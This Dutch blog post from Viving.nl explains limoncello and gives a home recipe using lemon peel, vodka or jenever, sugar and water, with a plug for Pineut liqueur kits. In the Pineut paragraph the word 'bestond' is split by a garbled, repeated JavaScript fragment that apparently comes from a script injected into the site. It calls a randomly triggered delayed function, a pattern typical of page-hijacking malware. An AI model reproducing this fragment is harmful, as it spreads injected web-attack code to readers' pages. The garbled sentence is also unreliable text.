Limoncello zelf maken? Zo dus!

Wat is er lekkerder dan een ijskoude limoncello na het eten? Heerlijk! Wist je dat je dit Italiaanse digestief ook heel goed zelf kunt maken? Lees hier het recept en voor je het weet proost je met je zelfgemaakte limoncello. Cin Cin!

Wat is Limoncello?

Limoncello is een Italiaanse likeur gemaakt van citroenen. In Italië wordt dit vooral na het eten gedronken. Tegenwoordig zie je dat de likeur ook als mix in prosecco en cocktails wordt gebruikt, maar ook in taarten zoals limoncello taart met amaretti, ricotta en mascarpone. Het recept is eigenlijk vrij eenvoudig en bestaat uit slechts vier ingrediënten; citroen, water, suiker en alcohol. In de likeur zit behoorlijk wat alcohol, gemiddeld zo tussen de 30 en 35 procent. Daar waar je in Italië pure alcohol in de supermarkt kan kopen is dit in Nederland verboden. Een goed alternatief voor dit recept is vodka of jonge graanjenever. Daarnaast gebruik je voornamelijk de schil van de citroen in dit recept, gebruik bij voorkeur biologische citroenen. Deze zijn onbespoten en vaak lekkerder van smaak!

Een echt familierecept…

Bijna elke Italiaanse familie heeft zo zijn eigen recept om limoncello te maken. Qua ingredienten zal er niet veel verschil in zitten, dit zit hem vooral in de verhoudingen. Gebruik je meer suiker, dan zal het alcoholpercentage iets hoger uitvallen en de limoncello sterker smaken. Hoe minder suiker, des te lager het alcoholpercentage.

Pineut Likeuren

Wil je een snelle limoncello zelf maken? Ga dan aan de slag met de zelfmaak likeuren van Pineut. De smaak ‘klaar voor een kus’ met limoen, eucalyptus, tijm en pepermunt heeft echt iets weg van deze likeur. Leuk om te weten is dat deze zelfmaak likeur geïnspireerd is op een likeurtje uit de 17e eeuw; een tijd dat er nog geen tandpasta besdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond. Vandaar de ingrediënten als eucalyptus en pepermunt. Als je een afspraakje dan nam je snel een verfrissend neutje voordat je iemand een kus gaf. Een goed excuus om een borrel te nemen!

Recept

Ingrediënten voor +/- 1 liter Limoncello

 • 5 grote biologische citroenen
 • 400 ml water
 • 600 ml vodka of jonge graanjenever
 • 200 gram suiker
 • Gesteriliseerde glazen fles

Aan de slag

 1. Was de citroenen en haal met een dunschiller de schil er af. Gebruik alleen het gele van de schil, het witte is wat bitter van smaak.
 2. Doe de wodka en de citroenschillen in de gesteriliseerde fles en laat dit 2-3 weken op een donkere, koele plek staan.
 3. Je kunt de limoncello nu zefen, zodat de schillen achter blijven.
 4. Breng de suiker met het water zachtjes aan de kook in een steelpan. Er ontstaat een suikersiroop die klaar is, als alle suiker is opgelost. Laat dit goed afkoelen.
 5. Voeg het suikermengsel samen met de gezeefde limoncello (beetje troebel).
 6. Laat de limoncello nog een week op een donkere, koele plek staan.
 7. Zorg dat de limoncello goed koud is voordat je deze serveert. Ik leg hem altijd even in de vriezer. Proost of zoals de Italianen zeggen, Cin Cin!

Score

 • Score 5.0

User Rating

5 (2 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Limoncello zelf maken? Zo dus!"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.